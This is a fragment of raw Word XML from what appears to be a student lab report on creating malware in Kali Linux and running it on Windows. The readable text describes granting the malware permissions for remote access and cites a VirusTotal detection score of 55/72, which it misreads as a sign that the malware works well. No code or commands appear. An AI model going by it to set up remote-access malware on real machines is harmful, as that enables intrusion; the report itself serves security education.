                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="003E0A3C" w:rsidP="00203DCD"/>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="00CD4309" w:rsidP="00203DCD">
      <w:r>
        <w:t>We give enough permissions to the malware, for it to run properly on the windows. This step prepares the malware to act freely and allow us access from the Kali Linux workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4309" w:rsidRDefault="00CD4309" w:rsidP="00203DCD">
      <w:r w:rsidRPr="00CD4309">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE552BD" wp14:editId="631653F4">
            <wp:extent cx="5563376" cy="263879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3376" cy="2638793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4309" w:rsidRDefault="00CD4309" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00CD4309" w:rsidRDefault="00CD4309" w:rsidP="00203DCD"/>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="00203DCD"/>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="009E0B23">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Score Of malware:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0B23" w:rsidRPr="009E0B23" w:rsidRDefault="00375C6D" w:rsidP="009E0B23">
      <w:r>
        <w:t xml:space="preserve">Virustotal.com is used, as told in the manual to help analyze the virus. The obtained score in 55/72. </w:t>
      </w:r>
      <w:r w:rsidR="00E87A92">
        <w:t>This points towards significantly good analysis and working of the malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="00203DCD"/>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="00203DCD"/>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="00203DCD">
      <w:r w:rsidRPr="009E0B23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57814B52" wp14:editId="3C36F810">
            <wp:extent cx="5943600" cy="3750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0310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E0B23" w:rsidRDefault="009E0B23" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00EC542E" w:rsidRDefault="00EC542E" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00EC542E" w:rsidRDefault="00EC542E" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00203DCD" w:rsidRPr="00203DCD" w:rsidRDefault="00203DCD" w:rsidP="00203DCD"/>
    <w:sectPr w:rsidR="00203DCD" w:rsidRPr="00203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B1AB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1764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A510B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C789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EC6B7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA2A6618"/>
    <w:lvl w:ilvl="0" w:tplc="23107E5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145E2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7C8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972042"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="631E15B2"/>
    <w:lvl w:ilvl="0" w:tplc="23107E5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DCD"/>
    <w:rsid w:val="00055D9C"/>
    <w:rsid w:val="000D218F"/>
    <w:rsid w:val="00120B99"/>
    <w:rsid w:val="00151E7F"/>
    <w:rsid w:val="00203C94"/>
    <w:rsid w:val="00203DCD"/>
    <w:rsid w:val="00207EFB"/>
    <w:rsid w:val="00373FEC"/>
    <w:rsid w:val="00375C6D"/>
    <w:rsid w:val="003931E2"/>
    <w:rsid w:val="003C0023"/>
    <w:rsid w:val="003E0A3C"/>
    <w:rsid w:val="003F6562"/>
    <w:rsid w:val="00456B9D"/>
    <w:rsid w:val="004D42B1"/>
    <w:rsid w:val="0066497A"/>
    <w:rsid w:val="006A5F71"/>
    <w:rsid w:val="006C1656"/>
    <w:rsid w:val="006F6EE0"/>
    <w:rsid w:val="00795448"/>
    <w:rsid w:val="0094023D"/>
    <w:rsid w:val="009E0B23"/>
    <w:rsid w:val="00A37BFE"/>
    <w:rsid w:val="00A80686"/>
    <w:rsid w:val="00AC1EDE"/>
    <w:rsid w:val="00B602D1"/>
    <w:rsid w:val="00CA1D7D"/>
    <w:rsid w:val="00CD4309"/>
    <w:rsid w:val="00D03C82"/>
    <w:rsid w:val="00DA0C7A"/>
    <w:rsid w:val="00DA2222"/>
    <w:rsid w:val="00E10A8C"/>
    <w:rsid w:val="00E40FC7"/>
    <w:rsid w:val="00E87A92"/>
    <w:rsid w:val="00EC5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953236-16BE-4AFC-A6F2-56A0721C6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3D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3D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DCD"/>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03D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DCD"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00203D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55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2022-12-12T19:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-12T19:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-12T19:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>